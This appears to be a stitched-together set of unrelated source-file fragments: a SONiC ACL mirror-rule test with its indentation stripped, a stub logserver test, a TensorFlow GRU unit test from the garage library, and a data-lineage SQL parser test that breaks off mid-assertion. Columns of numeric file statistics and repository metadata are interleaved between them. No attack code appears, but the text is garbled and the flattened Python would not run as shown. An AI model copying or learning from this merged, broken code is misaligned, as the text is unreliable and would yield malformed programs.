self.create_mirror_acl_ipv4_rule(acl_table, acl_rule_1, session)
# assert acl rule ipv4 is created
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ACL_ENTRY")
rule_entries = [k for k in tbl.getKeys() if k not in dvs.asicdb.default_acl_entries]
assert len(rule_entries) == 1
rule_id_v4 = rule_entries[0]
# assert acl rule is assocaited with table ipv4
(status, fvs) = tbl.get(rule_id_v4)
assert status == True
for fv in fvs:
if fv[0] == "SAI_ACL_ENTRY_ATTR_TABLE_ID":
assert fv[1] == table_id_v4
# create acl rule with IPv6 addresses
self.create_mirror_acl_ipv6_rule(acl_table_v6, acl_rule_2, session)
# assert acl rule ipv6 is created
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ACL_ENTRY")
rule_entries = [k for k in tbl.getKeys() if k not in dvs.asicdb.default_acl_entries]
assert len(rule_entries) == 2
rule_id_v6 = rule_entries[1] if rule_entries[0] == rule_id_v4 else rule_entries[0]
# assert acl rule is associated with table ipv6
(status, fvs) = tbl.get(rule_id_v6)
assert status == True
for fv in fvs:
if fv[0] == "SAI_ACL_ENTRY_ATTR_TABLE_ID":
assert fv[1] == table_id_v6
# remove acl rule
self.remove_mirror_acl_rule(acl_table, acl_rule_1)
self.remove_mirror_acl_rule(acl_table_v6, acl_rule_2)
# remove acl table
self.remove_acl_table(acl_table)
self.remove_acl_table(acl_table_v6)
# remove mirror session
self.remove_mirror_session(session)
# assert no mirror session in asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_MIRROR_SESSION")
assert len(tbl.getKeys()) == 0
# remove route; remove neighbor; remove ip; bring down port
self.remove_route(dvs, "4.4.4.4")
self.remove_neighbor("Ethernet32", "20.0.0.1")
self.remove_ip_address("Ethernet32", "20.0.0.0/31")
self.set_interface_status("Ethernet32", "down")
# Test case - intervene rule creation in table creation
# 0. predefine the VS platform: mellanox platform
# 1. create a mirror session
# 2. create the ipv4 ACL table
# 3. create the ipv4 ACL rule
# 4. create the ipv6 ACL table
# 5. create the ipv6 ACL rule
# 6. verify two rules are inserted successfully
def test_AclBindMirrorV6Reorder1(self, dvs, testlog):
"""
This test verifies IPv6 rules cannot be inserted into MIRROR table
"""
self.setup_db(dvs)
session = "MIRROR_SESSION"
acl_table = "MIRROR_TABLE"
acl_table_v6 = "MIRROR_TABLE_V6"
acl_rule_1 = "MIRROR_RULE_1"
acl_rule_2 = "MIRROR_RULE_2"
# bring up port; assign ip; create neighbor; create route
self.set_interface_status("Ethernet32", "up")
self.add_ip_address("Ethernet32", "20.0.0.0/31")
self.add_neighbor("Ethernet32", "20.0.0.1", "02:04:06:08:10:12")
self.add_route(dvs, "4.4.4.4", "20.0.0.1")
# create mirror session
self.create_mirror_session(session, "3.3.3.3", "4.4.4.4", "0x6558", "8", "100", "0")
assert self.get_mirror_session_state(session)["status"] == "active"
# assert mirror session in asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_MIRROR_SESSION")
assert len(tbl.getKeys()) == 1
mirror_session_oid = tbl.getKeys()[0]
# create acl table ipv4
self.create_acl_table(acl_table, ["Ethernet0", "Ethernet4"], "MIRROR")
# create acl rule with IPv4 addresses
self.create_mirror_acl_ipv4_rule(acl_table, acl_rule_1, session)
# create acl table ipv6
self.create_acl_table(acl_table_v6, ["Ethernet0", "Ethernet4"], "MIRRORV6")
# create acl rule with IPv6 addresses
self.create_mirror_acl_ipv6_rule(acl_table_v6, acl_rule_2, session)
# assert acl rules are created
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ACL_ENTRY")
rule_entries = [k for k in tbl.getKeys() if k not in dvs.asicdb.default_acl_entries]
assert len(rule_entries) == 2
# remove acl rule
self.remove_mirror_acl_rule(acl_table, acl_rule_1)
self.remove_mirror_acl_rule(acl_table_v6, acl_rule_2)
# remove acl table
self.remove_acl_table(acl_table)
self.remove_acl_table(acl_table_v6)
# remove mirror session
self.remove_mirror_session(session)
# assert no mirror session in asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_MIRROR_SESSION")
assert len(tbl.getKeys()) == 0
# remove route; remove neighbor; remove ip; bring down port
self.remove_route(dvs, "4.4.4.4")
self.remove_neighbor("Ethernet32", "20.0.0.1")
self.remove_ip_address("Ethernet32", "20.0.0.0/31")
self.set_interface_status("Ethernet32", "down")
# Test case - intervene rule creation in table creation
# 0. predefine the VS platform: mellanox platform
# 1. create a mirror session
# 2. create the ipv4 ACL table
# 3. create the ipv6 ACL rule
# 4. create the ipv6 ACL table
# 5. create the ipv4 ACL rule
# 6. verify two rules are inserted successfully
def test_AclBindMirrorV6Reorder2(self, dvs, testlog):
"""
This test verifies IPv6 rules cannot be inserted into MIRROR table
"""
self.setup_db(dvs)
session = "MIRROR_SESSION"
acl_table = "MIRROR_TABLE"
acl_table_v6 = "MIRROR_TABLE_V6"
acl_rule_1 = "MIRROR_RULE_1"
acl_rule_2 = "MIRROR_RULE_2"
# bring up port; assign ip; create neighbor; create route
self.set_interface_status("Ethernet32", "up")
self.add_ip_address("Ethernet32", "20.0.0.0/31")
self.add_neighbor("Ethernet32", "20.0.0.1", "02:04:06:08:10:12")
self.add_route(dvs, "4.4.4.4", "20.0.0.1")
# create mirror session
self.create_mirror_session(session, "3.3.3.3", "4.4.4.4", "0x6558", "8", "100", "0")
assert self.get_mirror_session_state(session)["status"] == "active"
# assert mirror session in asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_MIRROR_SESSION")
assert len(tbl.getKeys()) == 1
mirror_session_oid = tbl.getKeys()[0]
# create acl table ipv4
self.create_acl_table(acl_table, ["Ethernet0", "Ethernet4"], "MIRROR")
# create acl rule with IPv6 addresses
self.create_mirror_acl_ipv6_rule(acl_table_v6, acl_rule_2, session)
# assert acl rule is not created
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ACL_ENTRY")
rule_entries = [k for k in tbl.getKeys() if k not in dvs.asicdb.default_acl_entries]
assert len(rule_entries) == 0
# create acl table ipv6
self.create_acl_table(acl_table_v6, ["Ethernet0", "Ethernet4"], "MIRRORV6")
# create acl rule with IPv4 addresses
self.create_mirror_acl_ipv4_rule(acl_table, acl_rule_1, session)
# assert acl rules are created
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ACL_ENTRY")
rule_entries = [k for k in tbl.getKeys() if k not in dvs.asicdb.default_acl_entries]
assert len(rule_entries) == 2
# remove acl rule
self.remove_mirror_acl_rule(acl_table, acl_rule_1)
self.remove_mirror_acl_rule(acl_table_v6, acl_rule_2)
# remove acl table
self.remove_acl_table(acl_table)
self.remove_acl_table(acl_table_v6)
# remove mirror session
self.remove_mirror_session(session)
# assert no mirror session in asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_MIRROR_SESSION")
assert len(tbl.getKeys()) == 0
# remove route; remove neighbor; remove ip; bring down port
self.remove_route(dvs, "4.4.4.4")
self.remove_neighbor("Ethernet32", "20.0.0.1")
self.remove_ip_address("Ethernet32", "20.0.0.0/31")
self.set_interface_status("Ethernet32", "down")
# Test case - create ACL rules associated with wrong table
# 0. predefine the VS platform: mellanox platform
# 1. create a mirror session
# 2. create the ipv4 ACL table
# 3. create the ipv6 ACL rule associated with ipv4 table
# 4. create the ipv6 ACL table
# 5. create the ipv4 ACL rule associated with ipv6 table
# 6. verify two rules are inserted successfully
def test_AclBindMirrorV6WrongConfig(self, dvs, testlog):
"""
This test verifies IPv6 rules cannot be inserted into MIRROR table
"""
self.setup_db(dvs)
session = "MIRROR_SESSION"
acl_table = "MIRROR_TABLE"
acl_table_v6 = "MIRROR_TABLE_V6"
acl_rule_1 = "MIRROR_RULE_1"
acl_rule_2 = "MIRROR_RULE_2"
# bring up port; assign ip; create neighbor; create route
self.set_interface_status("Ethernet32", "up")
self.add_ip_address("Ethernet32", "20.0.0.0/31")
self.add_neighbor("Ethernet32", "20.0.0.1", "02:04:06:08:10:12")
self.add_route(dvs, "4.4.4.4", "20.0.0.1")
# create mirror session
self.create_mirror_session(session, "3.3.3.3", "4.4.4.4", "0x6558", "8", "100", "0")
assert self.get_mirror_session_state(session)["status"] == "active"
# assert mirror session in asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_MIRROR_SESSION")
assert len(tbl.getKeys()) == 1
mirror_session_oid = tbl.getKeys()[0]
# create acl table ipv4
self.create_acl_table(acl_table, ["Ethernet0", "Ethernet4"], "MIRROR")
# create WRONG acl rule with IPv6 addresses
self.create_mirror_acl_ipv6_rule(acl_table, acl_rule_2, session)
# assert acl rule is not created
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ACL_ENTRY")
rule_entries = [k for k in tbl.getKeys() if k not in dvs.asicdb.default_acl_entries]
assert len(rule_entries) == 0
# create acl table ipv6
self.create_acl_table(acl_table_v6, ["Ethernet0", "Ethernet4"], "MIRRORV6")
# create WRONG acl rule with IPv4 addresses
self.create_mirror_acl_ipv4_rule(acl_table_v6, acl_rule_1, session)
# assert acl rules are created
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_ACL_ENTRY")
rule_entries = [k for k in tbl.getKeys() if k not in dvs.asicdb.default_acl_entries]
assert len(rule_entries) == 0
# remove acl rule
self.remove_mirror_acl_rule(acl_table, acl_rule_1)
self.remove_mirror_acl_rule(acl_table_v6, acl_rule_2)
# remove acl table
self.remove_acl_table(acl_table)
self.remove_acl_table(acl_table_v6)
# remove mirror session
self.remove_mirror_session(session)
# assert no mirror session in asic database
tbl = swsscommon.Table(self.adb, "ASIC_STATE:SAI_OBJECT_TYPE_MIRROR_SESSION")
assert len(tbl.getKeys()) == 0
# remove route; remove neighbor; remove ip; bring down port
self.remove_route(dvs, "4.4.4.4")
self.remove_neighbor("Ethernet32", "20.0.0.1")
self.remove_ip_address("Ethernet32", "20.0.0.0/31")
self.set_interface_status("Ethernet32", "down")
| 40.058455
| 95
| 0.627111
| 2,599
| 19,188
| 4.411312
| 0.072336
| 0.057218
| 0.04396
| 0.053729
| 0.842652
| 0.82887
| 0.817619
| 0.774444
| 0.774444
| 0.759355
| 0
| 0.041534
| 0.264697
| 19,188
| 478
| 96
| 40.142259
| 0.771068
| 0.185637
| 0
| 0.705036
| 0
| 0
| 0.157114
| 0.048442
| 0
| 0
| 0.001554
| 0
| 0.097122
| 1
| 0.07554
| false
| 0
| 0.017986
| 0.003597
| 0.104317
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83a44169fcb2f8f7507958360bd98c8e924cff60
| 67
|
py
|
Python
|
logserver/test/test_standalone.py
|
mivade/logserver
|
eadb1223007a309e598300a95e7901e19a1018d5
|
[
"MIT"
] | null | null | null |
logserver/test/test_standalone.py
|
mivade/logserver
|
eadb1223007a309e598300a95e7901e19a1018d5
|
[
"MIT"
] | 2
|
2017-05-12T21:13:59.000Z
|
2018-06-28T17:46:46.000Z
|
logserver/test/test_standalone.py
|
mivade/logserver
|
eadb1223007a309e598300a95e7901e19a1018d5
|
[
"MIT"
] | null | null | null |
from ..standalone import main
def test_main():
pass # FIXME
| 11.166667
| 29
| 0.671642
| 9
| 67
| 4.888889
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.238806
| 67
| 5
| 30
| 13.4
| 0.862745
| 0.074627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.2
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
7905c3d866881e59dd31d04a242799ad65275156
| 17,963
|
py
|
Python
|
tests/garage/tf/models/test_gru.py
|
thanhkaist/garage
|
1d840df357282a675b8fce839bb0e5f72a8abba9
|
[
"MIT"
] | 7
|
2022-02-01T03:02:24.000Z
|
2022-02-10T12:54:05.000Z
|
tests/garage/tf/models/test_gru.py
|
thanhkaist/garage
|
1d840df357282a675b8fce839bb0e5f72a8abba9
|
[
"MIT"
] | null | null | null |
tests/garage/tf/models/test_gru.py
|
thanhkaist/garage
|
1d840df357282a675b8fce839bb0e5f72a8abba9
|
[
"MIT"
] | 2
|
2022-02-03T03:33:25.000Z
|
2022-02-10T12:54:07.000Z
|
import numpy as np
import pytest
import tensorflow as tf
from garage.tf.models.gru import gru
from tests.fixtures import TfGraphTestCase
from tests.helpers import recurrent_step_gru
class TestGRU(TfGraphTestCase):
def setup_method(self):
super().setup_method()
self.batch_size = 2
self.hidden_dim = 2
self.step_hidden_var = tf.compat.v1.placeholder(
shape=(self.batch_size, self.hidden_dim),
name='initial_hidden',
dtype=tf.float32)
self.gru_cell = tf.keras.layers.GRUCell(
units=self.hidden_dim,
activation=tf.nn.tanh,
kernel_initializer=tf.constant_initializer(1),
recurrent_activation=tf.nn.sigmoid,
recurrent_initializer=tf.constant_initializer(1),
name='lstm_layer')
# yapf: disable
@pytest.mark.parametrize('time_step, input_dim, output_dim, '
'hidden_init', [
(1, 1, 1, 0), # noqa: E122
(1, 1, 3, 0),
(1, 3, 1, 0),
(3, 1, 1, 0),
(3, 3, 1, 0),
(3, 3, 3, 0),
(1, 1, 1, 0.5),
(1, 1, 3, 0.5),
(1, 3, 1, 0.5),
(3, 1, 1, 0.5),
(3, 3, 1, 0.5),
(3, 3, 3, 0.5),
])
# yapf: enable
def test_output_shapes(self, time_step, input_dim, output_dim,
hidden_init):
obs_inputs = np.full((self.batch_size, time_step, input_dim), 1.)
obs_input = np.full((self.batch_size, input_dim), 1.)
input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, None, input_dim),
name='input')
step_input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, input_dim),
name='step_input')
output_nonlinearity = tf.keras.layers.Dense(
units=output_dim,
activation=None,
kernel_initializer=tf.constant_initializer(1))
with tf.compat.v1.variable_scope('GRU'):
self.gru = gru(
all_input_var=input_var,
name='gru',
gru_cell=self.gru_cell,
step_input_var=step_input_var,
step_hidden_var=self.step_hidden_var,
hidden_state_init=tf.constant_initializer(hidden_init),
output_nonlinearity_layer=output_nonlinearity)
self.sess.run(tf.compat.v1.global_variables_initializer())
# Compute output by doing t step() on the gru cell
outputs_t, output_t, h_t, hidden_init = self.gru
hidden = np.full((self.batch_size, self.hidden_dim),
hidden_init.eval())
for _ in range(time_step):
output, hidden = self.sess.run([output_t, h_t],
feed_dict={
step_input_var: obs_input,
self.step_hidden_var: hidden,
}) # noqa: E126
assert output.shape == (self.batch_size, output_dim)
assert hidden.shape == (self.batch_size, self.hidden_dim)
full_output = self.sess.run(outputs_t,
feed_dict={input_var: obs_inputs})
assert full_output.shape == (self.batch_size, time_step, output_dim)
# yapf: disable
@pytest.mark.parametrize('time_step, input_dim, output_dim, '
'hidden_init', [
(1, 1, 1, 0), # noqa: E122
(1, 1, 3, 0),
(1, 3, 1, 0),
(3, 1, 1, 0),
(3, 3, 1, 0),
(3, 3, 3, 0),
(1, 1, 1, 0.5),
(1, 1, 3, 0.5),
(1, 3, 1, 0.5),
(3, 1, 1, 0.5),
(3, 3, 1, 0.5),
(3, 3, 3, 0.5),
])
# yapf: enable
def test_output_value(self, time_step, input_dim, output_dim, hidden_init):
obs_inputs = np.full((self.batch_size, time_step, input_dim), 1.)
obs_input = np.full((self.batch_size, input_dim), 1.)
input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, None, input_dim),
name='input')
step_input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, input_dim),
name='step_input')
output_nonlinearity = tf.keras.layers.Dense(
units=output_dim,
activation=None,
kernel_initializer=tf.constant_initializer(1))
with tf.compat.v1.variable_scope('GRU'):
self.gru = gru(
all_input_var=input_var,
name='gru',
gru_cell=self.gru_cell,
step_input_var=step_input_var,
step_hidden_var=self.step_hidden_var,
hidden_state_init=tf.constant_initializer(hidden_init),
output_nonlinearity_layer=output_nonlinearity)
self.sess.run(tf.compat.v1.global_variables_initializer())
# Compute output by doing t step() on the gru cell
outputs_t, output_t, h_t, hidden_init = self.gru
hidden1 = hidden2 = np.full((self.batch_size, self.hidden_dim),
hidden_init.eval())
for i in range(time_step):
output1, hidden1 = self.sess.run([output_t, h_t],
feed_dict={
step_input_var: obs_input,
self.step_hidden_var: hidden1
}) # noqa: E126
hidden2 = recurrent_step_gru(input_val=obs_input,
num_units=self.hidden_dim,
step_hidden=hidden2,
w_x_init=1.,
w_h_init=1.,
b_init=0.,
nonlinearity=np.tanh,
gate_nonlinearity=lambda x: 1. /
(1. + np.exp(-x)))
output_nonlinearity = np.full(
(np.prod(hidden2.shape[1:]), output_dim), 1.)
output2 = np.matmul(hidden2, output_nonlinearity)
assert np.allclose(output1, output2)
assert np.allclose(hidden1, hidden2)
full_output1 = self.sess.run(outputs_t,
feed_dict={input_var: obs_inputs})
hidden2 = np.full((self.batch_size, self.hidden_dim),
hidden_init.eval())
stack_hidden = None
for i in range(time_step):
hidden2 = recurrent_step_gru(input_val=obs_inputs[:, i, :],
num_units=self.hidden_dim,
step_hidden=hidden2,
w_x_init=1.,
w_h_init=1.,
b_init=0.,
nonlinearity=np.tanh,
gate_nonlinearity=lambda x: 1. /
(1. + np.exp(-x)))
if stack_hidden is None:
stack_hidden = hidden2[:, np.newaxis, :]
else:
stack_hidden = np.concatenate(
(stack_hidden, hidden2[:, np.newaxis, :]), axis=1)
output_nonlinearity = np.full((np.prod(hidden2.shape[1:]), output_dim),
1.)
full_output2 = np.matmul(stack_hidden, output_nonlinearity)
assert np.allclose(full_output1, full_output2)
# yapf: disable
@pytest.mark.parametrize('time_step, input_dim, output_dim', [
(1, 1, 1),
(1, 1, 3),
(1, 3, 1),
(3, 1, 1),
(3, 3, 1),
(3, 3, 3),
])
# yapf: enable
def test_output_value_trainable_hidden_and_cell(self, time_step, input_dim,
output_dim):
obs_inputs = np.full((self.batch_size, time_step, input_dim), 1.)
obs_input = np.full((self.batch_size, input_dim), 1.)
input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, None, input_dim),
name='input')
step_input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, input_dim),
name='step_input')
output_nonlinearity = tf.keras.layers.Dense(
units=output_dim,
activation=None,
kernel_initializer=tf.constant_initializer(1))
with tf.compat.v1.variable_scope('GRU'):
self.gru = gru(all_input_var=input_var,
name='gru',
gru_cell=self.gru_cell,
step_input_var=step_input_var,
step_hidden_var=self.step_hidden_var,
hidden_state_init_trainable=True,
output_nonlinearity_layer=output_nonlinearity)
self.sess.run(tf.compat.v1.global_variables_initializer())
# Compute output by doing t step() on the gru cell
outputs_t, output_t, h_t, hidden_init = self.gru
hidden = np.full((self.batch_size, self.hidden_dim),
hidden_init.eval())
_, hidden = self.sess.run([output_t, h_t],
feed_dict={
step_input_var: obs_input,
self.step_hidden_var: hidden,
}) # noqa: E126
with tf.compat.v1.variable_scope('GRU/gru', reuse=True):
hidden_init_var = tf.compat.v1.get_variable(name='initial_hidden')
assert hidden_init_var in tf.compat.v1.trainable_variables()
full_output1 = self.sess.run(outputs_t,
feed_dict={input_var: obs_inputs})
hidden2 = np.full((self.batch_size, self.hidden_dim),
hidden_init.eval())
stack_hidden = None
for i in range(time_step):
hidden2 = recurrent_step_gru(input_val=obs_inputs[:, i, :],
num_units=self.hidden_dim,
step_hidden=hidden2,
w_x_init=1.,
w_h_init=1.,
b_init=0.,
nonlinearity=np.tanh,
gate_nonlinearity=lambda x: 1. /
(1. + np.exp(-x)))
if stack_hidden is None:
stack_hidden = hidden2[:, np.newaxis, :]
else:
stack_hidden = np.concatenate(
(stack_hidden, hidden2[:, np.newaxis, :]), axis=1)
output_nonlinearity = np.full((np.prod(hidden2.shape[1:]), output_dim),
1.)
full_output2 = np.matmul(stack_hidden, output_nonlinearity)
assert np.allclose(full_output1, full_output2)
def test_gradient_paths(self):
time_step = 3
input_dim = 2
output_dim = 4
obs_inputs = np.full((self.batch_size, time_step, input_dim), 1.)
obs_input = np.full((self.batch_size, input_dim), 1.)
input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, None, input_dim),
name='input')
step_input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, input_dim),
name='step_input')
output_nonlinearity = tf.keras.layers.Dense(
units=output_dim,
activation=None,
kernel_initializer=tf.constant_initializer(1))
with tf.compat.v1.variable_scope('GRU'):
self.gru = gru(all_input_var=input_var,
name='gru',
gru_cell=self.gru_cell,
step_input_var=step_input_var,
step_hidden_var=self.step_hidden_var,
output_nonlinearity_layer=output_nonlinearity)
self.sess.run(tf.compat.v1.global_variables_initializer())
# Compute output by doing t step() on the gru cell
outputs_t, output_t, h_t, hidden_init = self.gru
hidden = np.full((self.batch_size, self.hidden_dim),
hidden_init.eval())
grads_step_o_i = tf.gradients(output_t, step_input_var)
grads_step_o_h = tf.gradients(output_t, self.step_hidden_var)
grads_step_h = tf.gradients(h_t, step_input_var)
self.sess.run([grads_step_o_i, grads_step_o_h, grads_step_h],
feed_dict={
step_input_var: obs_input,
self.step_hidden_var: hidden,
}) # noqa: E126
grads_step_o_i = tf.gradients(outputs_t, step_input_var)
grads_step_o_h = tf.gradients(outputs_t, self.step_hidden_var)
grads_step_h = tf.gradients(h_t, input_var)
# No gradient flow
with pytest.raises(TypeError):
self.sess.run(grads_step_o_i,
feed_dict={
step_input_var: obs_input,
self.step_hidden_var: hidden,
})
with pytest.raises(TypeError):
self.sess.run(grads_step_o_h,
feed_dict={
step_input_var: obs_input,
self.step_hidden_var: hidden,
})
with pytest.raises(TypeError):
self.sess.run(grads_step_h, feed_dict={input_var: obs_inputs})
# yapf: disable
@pytest.mark.parametrize('time_step, input_dim, output_dim, '
'hidden_init', [
(1, 1, 1, 0), # noqa: E122
(1, 1, 3, 0),
(1, 3, 1, 0),
(3, 1, 1, 0),
(3, 3, 1, 0),
(3, 3, 3, 0),
(1, 1, 1, 0.5),
(1, 1, 3, 0.5),
(1, 3, 1, 0.5),
(3, 1, 1, 0.5),
(3, 3, 1, 0.5),
(3, 3, 3, 0.5),
])
# yapf: enable
def test_output_same_as_rnn(self, time_step, input_dim, output_dim,
hidden_init):
obs_inputs = np.full((self.batch_size, time_step, input_dim), 1.)
obs_input = np.full((self.batch_size, input_dim), 1.)
input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, None, input_dim),
name='input')
step_input_var = tf.compat.v1.placeholder(tf.float32,
shape=(None, input_dim),
name='step_input')
output_nonlinearity = tf.keras.layers.Dense(
units=output_dim,
activation=None,
kernel_initializer=tf.constant_initializer(1))
with tf.compat.v1.variable_scope('GRU'):
self.gru = gru(
all_input_var=input_var,
name='gru',
gru_cell=self.gru_cell,
step_input_var=step_input_var,
step_hidden_var=self.step_hidden_var,
hidden_state_init=tf.constant_initializer(hidden_init),
output_nonlinearity_layer=output_nonlinearity)
self.sess.run(tf.compat.v1.global_variables_initializer())
# Create a RNN and compute the entire outputs
rnn_layer = tf.keras.layers.RNN(cell=self.gru_cell,
return_sequences=True,
return_state=True)
# Set initial state to all 0s
hidden_var = tf.compat.v1.get_variable(
name='initial_hidden',
shape=(self.batch_size, self.hidden_dim),
initializer=tf.constant_initializer(hidden_init),
trainable=False,
dtype=tf.float32)
outputs, hiddens = rnn_layer(input_var, initial_state=[hidden_var])
outputs = output_nonlinearity(outputs)
self.sess.run(tf.compat.v1.global_variables_initializer())
outputs, hiddens = self.sess.run([outputs, hiddens],
feed_dict={input_var: obs_inputs})
# Compute output by doing t step() on the gru cell
hidden = np.full((self.batch_size, self.hidden_dim), hidden_init)
_, output_t, hidden_t, _ = self.gru
for i in range(time_step):
output, hidden = self.sess.run([output_t, hidden_t],
feed_dict={
step_input_var: obs_input,
self.step_hidden_var: hidden,
}) # noqa: E126
# The output from i-th timestep
assert np.array_equal(output, outputs[:, i, :])
assert np.array_equal(hidden, hiddens)
# Also the full output from lstm
full_outputs = self.sess.run(self.gru[0],
feed_dict={input_var: obs_inputs})
assert np.array_equal(outputs, full_outputs)
| 43.812195
| 79
| 0.490675
| 1,988
| 17,963
| 4.162475
| 0.078471
| 0.046405
| 0.03142
| 0.030816
| 0.843263
| 0.818248
| 0.79577
| 0.773535
| 0.765317
| 0.749728
| 0
| 0.031745
| 0.412515
| 17,963
| 409
| 80
| 43.919315
| 0.752393
| 0.032845
| 0
| 0.764535
| 0
| 0
| 0.019082
| 0
| 0
| 0
| 0
| 0
| 0.031977
| 1
| 0.017442
| false
| 0
| 0.017442
| 0
| 0.037791
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
791cf8ca54c637204d08ec80008965183109597e
| 14,000
|
py
|
Python
|
test/test_db_graph.py
|
raefezzeldin/data-lineage
|
a987575d941cc04ad481693a16f0d4cce7ca25d5
|
[
"MIT"
] | null | null | null |
test/test_db_graph.py
|
raefezzeldin/data-lineage
|
a987575d941cc04ad481693a16f0d4cce7ca25d5
|
[
"MIT"
] | null | null | null |
test/test_db_graph.py
|
raefezzeldin/data-lineage
|
a987575d941cc04ad481693a16f0d4cce7ca25d5
|
[
"MIT"
] | null | null | null |
import logging
from contextlib import closing
import pytest
from networkx import edges, nodes
from data_lineage.catalog import ColumnEdge
from data_lineage.parser import create_graph
from data_lineage.parser import parse as parse_single
from data_lineage.parser import visit_dml_queries
from data_lineage.parser.dml_visitor import SelectSourceVisitor
logging.basicConfig(level=getattr(logging, "DEBUG"))
def test_no_insert_column_graph(save_catalog):
file_catalog, catalog = save_catalog
query = """
INSERT INTO page_lookup_nonredirect
SELECT page.page_id as redirect_id, page.page_title as redirect_title,
page.page_title true_title, page.page_id, page.page_latest
FROM page
"""
parsed = parse_single(query)
visitor = SelectSourceVisitor()
parsed.accept(visitor)
visitor.bind(catalog)
graph = create_graph(catalog, [visitor])
assert [node.fqdn for node in sorted(list(nodes(graph.graph)))] == [
("test", "default", "page", "page_id"),
("test", "default", "page", "page_latest"),
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_nonredirect", "redirect_id"),
("test", "default", "page_lookup_nonredirect", "redirect_title"),
("test", "default", "page_lookup_nonredirect", "true_title"),
("test", "default", "page_lookup_nonredirect", "page_id"),
("test", "default", "page_lookup_nonredirect", "page_version"),
]
expected_edges = [
(
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_nonredirect", "redirect_id"),
),
(
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_nonredirect", "page_id"),
),
(
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_nonredirect", "redirect_title"),
),
(
("test", "default", "page", "page_title"),
("test", "default", "page_lookup_nonredirect", "true_title"),
),
(
("test", "default", "page", "page_latest"),
("test", "default", "page_lookup_nonredirect", "page_version"),
),
]
assert [
(edge[0].fqdn, edge[1].fqdn) for edge in list(edges(graph.graph))
] == expected_edges
with closing(catalog.session) as session:
all_edges = session.query(ColumnEdge).all()
assert set([(e.source.fqdn, e.target.fqdn) for e in all_edges]) == set(
expected_edges
)
def test_basic_column_graph(save_catalog):
file_catalog, catalog = save_catalog
query = "INSERT INTO page_lookup_nonredirect(page_id, page_version) SELECT page.page_id, page.page_latest FROM page"
parsed = parse_single(query)
visitor = SelectSourceVisitor()
parsed.accept(visitor)
visitor.bind(catalog)
graph = create_graph(catalog, [visitor])
assert [node.fqdn for node in sorted(list(nodes(graph.graph)))] == [
("test", "default", "page", "page_id"),
("test", "default", "page", "page_latest"),
("test", "default", "page_lookup_nonredirect", "page_id"),
("test", "default", "page_lookup_nonredirect", "page_version"),
]
expected_edges = [
(
("test", "default", "page", "page_id"),
("test", "default", "page_lookup_nonredirect", "page_id"),
),
(
("test", "default", "page", "page_latest"),
("test", "default", "page_lookup_nonredirect", "page_version"),
),
]
assert [
(edge[0].fqdn, edge[1].fqdn) for edge in list(edges(graph.graph))
] == expected_edges
table = catalog.get_table(
database_name="test",
schema_name="default",
table_name="page_lookup_nonredirect",
)
columns = catalog.get_columns_for_table(
table, column_names=["page_id", "page_version"]
)
assert len(columns) == 2
with closing(catalog.session) as session:
all_edges = (
session.query(ColumnEdge)
.filter(ColumnEdge.target_id.in_([c.id for c in columns]))
.all()
)
assert set([(e.source.fqdn, e.target.fqdn) for e in all_edges]) == set(
expected_edges
)
@pytest.fixture(scope="module")
def get_graph(save_catalog, parse_queries_fixture):
file_catalog, catalog = save_catalog
dml_queries = visit_dml_queries(catalog, parse_queries_fixture)
graph = create_graph(catalog, dml_queries)
yield graph, catalog
def test_column_graph(get_graph):
graph, catalog = get_graph
assert [node.fqdn for node in sorted(list(nodes(graph.graph)))] == [
("test", "default", "filtered_pagecounts", "views"),
("test", "default", "filtered_pagecounts", "bytes_sent"),
("test", "default", "normalized_pagecounts", "page_id"),
